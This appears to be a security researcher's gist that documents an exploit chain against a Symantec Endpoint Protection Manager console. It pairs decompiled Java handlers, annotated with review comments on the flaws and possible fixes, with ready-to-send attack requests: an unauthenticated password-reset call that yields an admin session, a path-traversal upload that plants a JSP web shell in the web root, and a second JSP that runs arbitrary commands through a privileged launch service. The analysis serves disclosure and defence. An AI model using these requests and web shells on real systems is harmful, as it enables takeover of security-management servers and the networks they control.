
@mwulftange
Last active August 29, 2015 14:26
POST /servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/exec.jsp&KnownHosts=. HTTP/1.1
Host: 192.168.40.133:8443
Cookie: JSESSIONID=625B492F4B9B6DA96B5E0C70A8A72F40
Content-Length: 124
<%=new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("\\A").next()%>
/* */ // Decompiled excerpt of a console request handler (original lines 60-187 and 247-328
/* */ // are elided). The part shown serves Action=UploadPackage: it copies the request body
/* */ // to a file below the server's temporary package directory and reports the outcome in
/* */ // the ResponseCode attribute of the first <Response> element of doc.
/* */ //
/* */ // Security review: the target file name comes from the PackageFile request parameter
/* */ // and is concatenated into the output path without any check (line 199), so the write
/* */ // is not confined to the package directory. The request shown on this page supplies a
/* */ // PackageFile value with parent-directory segments. A fix would build the candidate
/* */ // path, canonicalise it, and reject the request unless the result is still located
/* */ // under packageTempPath (or accept only a bare file name).
/* */ // No use of the session parameter is visible in this excerpt.
/* */ public void handleRequest(RequestData requestData, ConsoleSession session, Document doc)
/* */ {
/* 54 */ NodeList list = doc.getElementsByTagName("Response");
/* 55 */ Element root = (Element)list.item(0);
/* 56 */ String action = (String)requestData.get("Action");
/* 57 */ String id = (String)requestData.get("GUID");
/* 58 */ String fileType = (String)requestData.get("FILE_TYPE");
/* 59 */ String newId = (String)requestData.get("NEW_GUID");
/* */
/* 60-187 skipped */
/* */
/* 189 */ if (action.equalsIgnoreCase("UploadPackage")) {
/* */ // Both values below are request parameters, i.e. controlled by the caller.
/* 190 */ String fileName = (String)requestData.get("PackageFile");
/* 191 */ String dirName = (String)requestData.get("KnownHosts");
/* */
/* */ // NOTE(review): the base directory is stored in an instance field on every request;
/* */ // if one handler instance serves concurrent requests this is racy - confirm.
/* 193 */ this.packageTempPath = (ScmProperties.getServerHome() + ConstantValue.TEMP_PACKAGE_RELATIVE_PATH);
/* */
/* */
/* */ // Only dirName is screened, and only for path separators; a value of "." (as in the
/* */ // request shown on this page) passes. fileName gets no equivalent screening.
/* 196 */ if ((dirName != null) && (dirName.length() > 0) && (!dirName.contains("/")) && (!dirName.contains("\\"))) {
/* 197 */ this.packageTempPath = (this.packageTempPath + File.separator + dirName);
/* */ }
/* */ // Unvalidated concatenation: this is where the path can leave packageTempPath.
/* 199 */ String path = this.packageTempPath + File.separator + fileName;
/* 200 */ FileOutputStream fos = null;
/* 201 */ BufferedOutputStream bos = null;
/* 202 */ Object is = null;
/* 203 */ BufferedInputStream bis = null;
/* */
/* 205 */ File folder = new File(this.packageTempPath);
/* 206 */ if (!folder.exists()) {
/* 207 */ if (!folder.mkdirs()) {
/* */ // NOTE(review): unlike the emptyDir failure below there is no return here, so
/* */ // execution appears to continue to the write after reporting the error code.
/* 208 */ root.setAttribute("ResponseCode", String.valueOf(303169573));
/* */ }
/* */ }
/* */ else {
/* */ try
/* */ {
/* */ // Existing directory: presumably cleared before the upload; the meaning of the
/* */ // second argument is not visible in this excerpt.
/* 214 */ Utility.emptyDir(folder.getCanonicalPath(), false);
/* */ } catch (IOException e) {
/* 216 */ ServerLogger.log(this, e);
/* 217 */ root.setAttribute("ResponseCode", String.valueOf(303169573));
/* */
/* 219 */ return;
/* */ }
/* */ }
/* */
/* 223 */ byte[] buf = new byte[1024];
/* 224 */ int read = 0;
/* */ try
/* */ {
/* */ // The request stream is wrapped twice (is, then bis). The body is copied verbatim to
/* */ // path; no size limit or content/extension check is visible in this excerpt.
/* 227 */ is = new BufferedInputStream(requestData.getInputStream());
/* 228 */ fos = new FileOutputStream(path);
/* 229 */ bos = new BufferedOutputStream(fos);
/* 230 */ bis = new BufferedInputStream((InputStream)is);
/* 231 */ while ((read = bis.read(buf)) > 0) {
/* 232 */ bos.write(buf, 0, read);
/* */ }
/* 234 */ bos.flush();
/* */ // 0 is reported after a completed copy.
/* 235 */ root.setAttribute("ResponseCode", String.valueOf(0));
/* */ } catch (IOException ex) {
/* 237 */ ServerLogger.log(this, ex);
/* 238 */ root.setAttribute("ResponseCode", String.valueOf(303169573));
/* */ }
/* */ finally
/* */ {
/* */ // All four streams are closed on every path; note fos is closed before the bos
/* */ // that wraps it.
/* 242 */ IOUtilities.closeInputStream((InputStream)is);
/* 243 */ IOUtilities.closeInputStream(bis);
/* 244 */ IOUtilities.closeOutputStream(fos);
/* 245 */ IOUtilities.closeOutputStream(bos);
/* */ }
/* */
/* 247-328 skipped */
/* */
/* */ }
/* */ }
POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
ActionType=ResetPassword&UserID=admin&Domain=
HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=625B492F4B9B6DA96B5E0C70A8A72F40; Path=/; Secure; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/xml;charset=UTF-8
Date: Tue, 30 Jun 2015 11:19:30 GMT
Server: SEPM
Content-Length: 971
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<Response ResponseCode="-2130181964">
<ReportingElement>&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;&#13;
&lt;ReportingInfo AdminType="0" AllowCollectFileFingerprintList="1" AllowDeleteFromQuarantine="1" AllowDisableDownloadAdvisor="1" AllowDisableNetworkThreatProtect="1" AllowEnableAutoProtect="1" AllowEnableDownloadAdvisor="1" AllowEnableNetworkThreatProtect="1" AllowPowerEraserScan="1" AllowRestartComputers="1" AllowScan="1" AllowUpdateContent="1" AllowUpdateContentScan="1" AllowedDomains="" ChangePwd="0" ComplianceOnly="0" ComputerIPs="" ComputerNames="" DateFormat="M/d/yy" DisallowedCentralizedExceptions="0" FullAccessGroupList="" GroupWhiteList="" IsStoredProcedureValid="0" KICKOUTTIME="3600000" Lang="en_US" LastLoginTime="1435663154502" LegacyDomains="" LegacyGroups="" Role="1" Servers="" Session="625B492F4B9B6DA96B5E0C70A8A72F40"/&gt;&#13;
</ReportingElement>
</Response>
/* */ // Returns an AdminCredential for the password-reset flow and, as a side effect, binds
/* */ // it to a freshly created session.
/* */ //
/* */ // Security review: the credential comes from doGetAdminCredentialWithoutAuthentication()
/* */ // and is attached to the new session without any check of the caller in this method;
/* */ // requestData is not consulted at all. What that helper returns is not shown here, but
/* */ // the sample response on this page carries a Set-Cookie for a session whose
/* */ // ReportingInfo lists Role="1". A reset flow should keep such a credential in a
/* */ // server-internal context and never store it on a session handed back to the client.
/* */ protected AdminCredential getCredential(RequestData requestData, ConsoleSession session) throws ServerException
/* */ {
/* */ // The parameter is reassigned: the caller's session object is replaced by a new one.
/* 367 */ session = session.getNewSession();
/* 368 */ AdminCredential credential = doGetAdminCredentialWithoutAuthentication();
/* */ // From here on the new session holds the credential obtained above.
/* 369 */ session.setAdminCredential(credential);
/* 370 */ return credential;
/* */ }
/* */ // Decompiled excerpt of the password-reset handler (original lines 106-137 are elided).
/* */ // It reads UserID and Domain from the request, runs a series of precondition checks,
/* */ // obtains an AdminCredential through getCredential(), and on any ServerException
/* */ // writes a combined error value into the ResponseCode attribute of <Response>.
/* */ //
/* */ // Security review: getCredential() is reached by any request that passes the checks
/* */ // above it; none of the checks visible here authenticates the caller. In the
/* */ // getCredential listing on this page that call binds a credential to a new session.
/* */ // The sample response on this page has ResponseCode -2130181964, which is consistent
/* */ // with the catch path below (-2130182144 | 180), yet it still carries a session cookie,
/* */ // suggesting the session survives a failed reset - confirm against the elided lines.
/* */ public void handleRequest(RequestData requestData, ConsoleSession session, Document doc)
/* */ {
/* */ // NOTE(review): per-request data stored in an instance field; racy if the handler
/* */ // instance is shared between requests - confirm.
/* 72 */ this.requestData = requestData;
/* 73 */ String userName = (String)requestData.get("UserID");
/* 74 */ String domainName = (String)requestData.get("Domain");
/* */
/* 76 */ NodeList list = doc.getElementsByTagName("Response");
/* 77 */ Element root = (Element)list.item(0);
/* */ try
/* */ {
/* */ // Check keyed on the caller's remote IP; presumably a rate limit (helper not shown).
/* 80 */ if (!isValidRequestWithinGivenInterval(requestData.getRemoteIP())) {
/* 81 */ throw new ServerException(-2130182144, 186);
/* */ }
/* */
/* 84 */ checkIfSiteCanRecoverPasswords();
/* 85 */ init();
/* */
/* */ // sRecipient is not assigned in this excerpt; presumably set by init() - confirm.
/* 87 */ if ((this.sRecipient == null) || (this.sRecipient.length() == 0) || (" ".equals(this.sRecipient))) {
/* 88 */ ServerLogger.log(Level.INFO, "Problem with Mail server Configuration");
/* 89 */ throw new ServerException(-2130182144, 179);
/* */ }
/* */
/* */ // Credential lookup happens before the authentication-mode check below.
/* 92 */ AdminCredential credential = getCredential(requestData, session);
/* */
/* 94 */ if ((credential != null) && (credential.getAdminID() != null)) {
/* 95 */ Integer mode = credential.getOptAuthenticationMethod();
/* */ // Reset is refused when the admin's authentication method differs from
/* */ // SemAdministrator.DEFAULT.
/* 96 */ if ((mode != null) && (SemAdministrator.DEFAULT.intValue() != mode.intValue())) {
/* 97 */ ServerLogger.log(Level.INFO, "Particular admin named " + credential.getAdminName() + " is not at Symantec authentication mode. Failed to reset password.");
/* */
/* 100 */ throw new ServerException(-2130182144, 191);
/* */ }
/* */
/* */ }
/* */
/* 106-137 skipped */
/* */
/* */ }
/* */ catch (ServerException e) {
/* */ // Error code and message id are OR-ed into one integer and returned as text.
/* */ // Nothing in this handler undoes the session change made by getCredential().
/* 142 */ root.setAttribute("ResponseCode", "" + (e.getErrorCode() | e.getMessageId()));
/* */ }
/* */ }
<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%
// JSP page from the write-up: it hands the "cmd" request parameter, unvalidated, to
// SemLaunchService.execute("CommonCMD", ...) and prints whatever that call returns.
// Review: the page contains no authentication or authorisation check of its own.
// What "CommonCMD" runs and with which privileges is not shown here. A file with this
// content in a web application directory should be treated as an indicator of
// compromise.
try {
// "/c" and the request's cmd value form the argument list passed to the service.
out.print(SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", request.getParameter("cmd"))));
} catch (Exception e) {
// Every exception is discarded: nothing is logged and the response carries no error.
}
%>